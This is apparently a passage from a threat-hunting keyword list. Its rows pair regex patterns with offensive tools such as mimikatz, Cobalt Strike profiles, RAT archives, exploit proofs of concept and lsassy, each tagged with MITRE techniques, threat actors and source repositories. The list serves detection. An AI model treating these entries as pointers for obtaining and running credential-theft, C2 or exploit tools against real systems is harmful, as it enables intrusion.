"*/raceabrt.c*",".{0,1000}\/raceabrt\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","10141" "*/RagingRotator.git*",".{0,1000}\/RagingRotator\.git.{0,1000}","offensive_tool_keyword","RagingRotator","A tool for carrying out brute force attacks against Office 365 with built in IP rotation use AWS gateways.","T1110 - T1027 - T1071 - T1090 - T1621","TA0006 - TA0005 - TA0001","N/A","N/A","Credential Access","https://github.com/nickzer0/RagingRotator","1","1","N/A","N/A","10","1","79","7","2024-06-06T19:31:34Z","2023-09-01T15:19:38Z","10146" "*/RagingRotator.go*",".{0,1000}\/RagingRotator\.go.{0,1000}","offensive_tool_keyword","RagingRotator","A tool for carrying out brute force attacks against Office 365 with built in IP rotation use AWS gateways.","T1110 - T1027 - T1071 - T1090 - T1621","TA0006 - TA0005 - TA0001","N/A","N/A","Credential Access","https://github.com/nickzer0/RagingRotator","1","1","N/A","N/A","10","1","79","7","2024-06-06T19:31:34Z","2023-09-01T15:19:38Z","10147" "*/rahul1406/cve-2022-0847dirtypipe-exploit*",".{0,1000}\/rahul1406\/cve\-2022\-0847dirtypipe\-exploit.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/rahul1406/cve-2022-0847dirtypipe-exploit","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","10148" "*/RAI.git*",".{0,1000}\/RAI\.git.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - 
T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","N/A","10","10","304","53","2024-11-24T16:29:36Z","2018-02-12T16:23:23Z","10149" "*/rakjong/mimikatz_bypassAV/*",".{0,1000}\/rakjong\/mimikatz_bypassAV\/.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","10150" "*/ramnit.profile*",".{0,1000}\/ramnit\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - 
TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","362","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z","10151" "*/random-robbie/cve-2022-23131-exp*",".{0,1000}\/random\-robbie\/cve\-2022\-23131\-exp.{0,1000}","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0003 - TA0002","N/A","N/A","Exploitation tool","https://github.com/random-robbie/cve-2022-23131-exp/blob/main/zabbix.py","1","1","N/A","N/A","N/A","1","8","7","2022-02-23T16:37:13Z","2022-02-23T16:34:03Z","10152" "*/Ransomware.dll*",".{0,1000}\/Ransomware\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","N/A","10","","N/A","","","","10153" "*/Ransomware.exe*",".{0,1000}\/Ransomware\.exe.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool 
in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","1","N/A","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","10154" "*/Ransomware.pdb*",".{0,1000}\/Ransomware\.pdb.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","N/A","10","","N/A","","","","10155" "*/rarce.py*",".{0,1000}\/rarce\.py.{0,1000}","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","1","N/A","N/A","9","2","115","18","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z","10156" "*/rasman.exe*",".{0,1000}\/rasman\.exe.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","1","N/A","N/A","10","4","371","53","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z","10157" "*/RasmanPotato*",".{0,1000}\/RasmanPotato.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","1","N/A","N/A","10","4","371","53","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z","10158" "*/Rat_Generator*",".{0,1000}\/Rat_Generator.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - 
T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","10159" "*/ratankba.profile*",".{0,1000}\/ratankba\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","362","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z","10160" 
"*/RATC.exe*",".{0,1000}\/RATC\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","10161" "*/ratchatpt.git*",".{0,1000}\/ratchatpt\.git.{0,1000}","offensive_tool_keyword","ratchatgpt","ratchatpt a tool using openai api as a C2","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","N/A","N/A","10","10","16","6","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z","10162" "*/ratchatpt.git*",".{0,1000}\/ratchatpt\.git.{0,1000}","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","N/A","risk of False positive","10","10","16","6","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z","10163" "*/ratchatPT.go*",".{0,1000}\/ratchatPT\.go.{0,1000}","offensive_tool_keyword","ratchatgpt","ratchatpt a tool using openai api as a C2","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","N/A","N/A","10","10","16","6","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z","10164" "*/ratchatPT.go*",".{0,1000}\/ratchatPT\.go.{0,1000}","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","N/A","risk of False positive","10","10","16","6","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z","10165" "*/ratchatPT.syso*",".{0,1000}\/ratchatPT\.syso.{0,1000}","offensive_tool_keyword","ratchatgpt","ratchatpt a tool using openai api as a C2","T1094 - T1071.001","TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","N/A","N/A","10","10","16","6","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z","10166" "*/ratchatPT.syso*",".{0,1000}\/ratchatPT\.syso.{0,1000}","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","N/A","risk of False positive","10","10","16","6","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z","10167" "*/RationalLove.c",".{0,1000}\/RationalLove\.c","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","10176" "*/ratnow.exe*",".{0,1000}\/ratnow\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","10177" "*/rats/badrat_cs/*",".{0,1000}\/rats\/badrat_cs\/.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","1","N/A","N/A","10","1","N/A","N/A","N/A","N/A","10178" "*/rattler.git*",".{0,1000}\/rattler\.git.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","1","N/A","N/A","9","6","531","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z","10179" "*/Rattler_32.exe*",".{0,1000}\/Rattler_32\.exe.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - 
T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","1","N/A","N/A","9","6","531","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z","10180" "*/Rattler_x64.exe*",".{0,1000}\/Rattler_x64\.exe.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","1","N/A","N/A","9","6","531","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z","10181" "*/raw/kali/main/*",".{0,1000}\/raw\/kali\/main\/.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A","10182" "*/raw/kali/master/*",".{0,1000}\/raw\/kali\/master\/.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A","10183" "*/raw/main/gsocket/*",".{0,1000}\/raw\/main\/gsocket\/.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","10184" "*/raw/master/Release/Happy.exe*",".{0,1000}\/raw\/master\/Release\/Happy\.exe.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","1","N/A","N/A","9","","N/A","","","","10186" "*/raw/master/Release/Happy_x64.exe*",".{0,1000}\/raw\/master\/Release\/Happy_x64\.exe.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","1","N/A","N/A","9","","N/A","","","","10187" "*/raw_shellcode_size.txt*",".{0,1000}\/raw_shellcode_size\.txt.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - 
T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RCStep/CSSG","1","1","N/A","N/A","10","10","654","112","2025-01-08T23:11:49Z","2021-01-12T14:39:06Z","10189" "*/rawrpc.py*",".{0,1000}\/rawrpc\.py.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","10190" "*/rawrpc_embedded.py*",".{0,1000}\/rawrpc_embedded\.py.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","10191" "*/RAZAR ASRAT.exe*",".{0,1000}\/RAZAR\sASRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - 
TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","10192" "*/Razar SRAT.exe*",".{0,1000}\/Razar\sSRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","10193" "*/rbcd.py*",".{0,1000}\/rbcd\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","10194" "*/RC4BinaryEncryption.cs*",".{0,1000}\/RC4BinaryEncryption\.cs.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. 
Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tool","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","N/A","6","520","79","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z","10195" "*/RC4Payload32.txt*",".{0,1000}\/RC4Payload32\.txt.{0,1000}","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","N/A","10","10","829","141","2025-04-02T09:37:10Z","2020-08-17T21:33:06Z","10196" "*/rcat-v*-win-x86_64.exe*",".{0,1000}\/rcat\-v.{0,1000}\-win\-x86_64\.exe.{0,1000}","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","1","N/A","N/A","10","10","758","63","2024-07-20T14:20:34Z","2021-06-04T17:03:47Z","10197" "*/RCStep/CSSG/*",".{0,1000}\/RCStep\/CSSG\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker 